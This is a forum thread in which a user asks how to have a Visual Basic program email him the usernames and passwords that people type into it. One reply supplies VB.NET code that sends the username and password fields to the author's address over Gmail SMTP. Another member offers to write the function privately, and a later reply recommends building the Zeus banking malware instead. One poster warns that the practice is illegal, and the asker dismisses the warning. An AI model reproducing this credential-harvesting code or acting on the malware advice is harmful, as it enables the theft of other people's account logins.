Need help with VisualBasic

ivanfitzy

Junior Member
Joined
Aug 27, 2013
Messages
179
Reaction score
55
Sorry if I started this in the wrong place, I don't know where it goes.
Just wondering if it is still possible to get what people type into your program emailed to you
e.g. if they typed in a username and password could you then get that emailed to yourself.
Ivan
 
of course its possible. the easiest way is store the information and have vb upload the info to a website.
 
It can be done via gmail.

Imports system.net.mail

Dim smtpserver as new Smtpclient()
Dim mail as new mailmessage()
smtpserver.Credentials = New Net.NetworkCredential("[email protected]", "password")
smtpserver.Port = 587
smtpserver.Host = "smtp.gmail.com"
smtpserver.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("[email protected]")
mail.To.Add("Mail")
mail.Subject = "Subject"
mail.Body = usernametxt.text & ":" & passwordtxt.text
smtpserver.Send(mail)

I found this code somewhere a long time ago (cannot remember where so I am unable to give credits) so it may not work, but if it still does its a bonus lol

There is an issue that your exe can be decompiled and your email details can be seen.
 
Hey Ivan!

If you want a function for what you are asking, just let me know. I'll gladly create the function you are looking for.
 
Why you need them?? Store private info like username and password that not are related to your service or your website (example email accounts, google accounts, facebook accounts etc) is a crime in all the world. Think about it before to go in jail.
just my 2 cent ;)
 
Why you need them?? Store private info like username and password that not are related to your service or your website (example email accounts, google accounts, facebook accounts etc) is a crime in all the world. Think about it before to go in jail.
just my 2 cent ;)
dont worry man, the user is fully aware of what is happening :)
Ivan
 
Hey Ivan!

If you want a function for what you are asking, just let me know. I'll gladly create the function you are looking for.
check yo' inbox :P
Ivan
 
Lol, it's called keylogged and what moron of a user is ok with that. The method you're talking about is stupid though, find a tell a friend script and you can use that instead of having to reveal your login information to the account you're sending the information. Or get a copy of Zues and just make your own build to target what your looking for....
 
Back
Top